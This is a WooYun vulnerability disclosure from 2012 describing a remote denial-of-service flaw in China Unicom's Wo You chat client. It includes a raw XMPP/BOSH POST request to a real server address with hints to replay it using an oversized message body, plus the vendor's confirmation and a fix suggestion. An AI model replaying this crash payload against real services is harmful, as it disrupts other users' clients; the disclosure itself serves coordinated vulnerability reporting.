当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09359

漏洞标题:联通沃友远程拒绝服务漏洞

相关厂商:中国联通

漏洞作者: Anonymous.Antisec

提交时间:2012-07-09 08:32

修复时间:2012-08-23 08:33

公开时间:2012-08-23 08:33

漏洞类型:拒绝服务

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-09: 细节已通知厂商并且等待厂商处理中
2012-07-12: 厂商已经确认,细节仅向厂商公开
2012-07-15: 细节向第三方安全合作伙伴开放
2012-09-05: 细节向核心白帽子及相关领域专家公开
2012-09-15: 细节向普通白帽子公开
2012-09-25: 细节向实习白帽子公开
2012-08-23: 细节向公众公开

简要描述:

可远程pia的一下 就可能让客户端崩溃。pc显示未响应、iphone客户端崩溃。android未测。还有尼玛为啥我之前发的漏洞一直是未审核?
found by Anonymous.AntiSec
anonymous.antisec#foxmail.com

详细说明:

沃友聊天软件是联通旗下的跨平台聊天软件。由于服务器端未对用户输入的字符串有限制,有可能导致致使PC端、iphone、android等平台的软件崩溃。
效果:1.iphone客户端卡死,然后直接程序自动关闭。
2.pc:程序卡死
3.Android客户端,未测试。
漏洞形成原因分析:
可能是由于提交大字符串的聊天信息,导致程序响应不过来,程序自动终止进程。

POST http://123.125.97.179:5280/bosh HTTP/1.1
Accept: text/xml, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 593
Content-Type: text/xml;charset=utf-8
Host: 127.0.0.1:8080
Proxy-Connection: keep-alive
Referer: 123.125.97.179:5280
User-Agent: woclient
<body sid='ad678a99-b21b-47af-896d-e4070b07e8c9' rid='1728689542'/*rid为一个字符串,貌似每秒加1,回放数据包的时候记得要改变rid为一个新值*/ xmlns='http://jabber.org/protocol/httpbind'><message type="chat" from="id@im.wo.com.cn/woclient" to="id@im.wo.com.cn/woclient" id="UDmUQF25" ack="true">
<body>/*聊天信息内容,提交几万个A试试就知道了*/test3</body>
<request xmlns="urn:xmpp:receipts" type="all"/></message></body>

漏洞证明:

修复方案:

服务器端限制用户提交的数据大小

版权声明:转载请注明来源 Anonymous.Antisec@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2012-07-12 10:02

厂商回复:

添加对漏洞的补充说明以及做出评价的理由

最新状态:

2012-07-12:上午确认未进行说明,现补充相关情况:CNVD先行确认有关情况(暂未实时测试复现),转由涉事单位(集团公司)测试确认,以便加快处置流程,按部分影响可用性进行评分,rank=4.96*1.0*1.3=6.448


漏洞评价:

评论

  1. 2012-08-23 09:10 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    这个好牛叉 我看到了od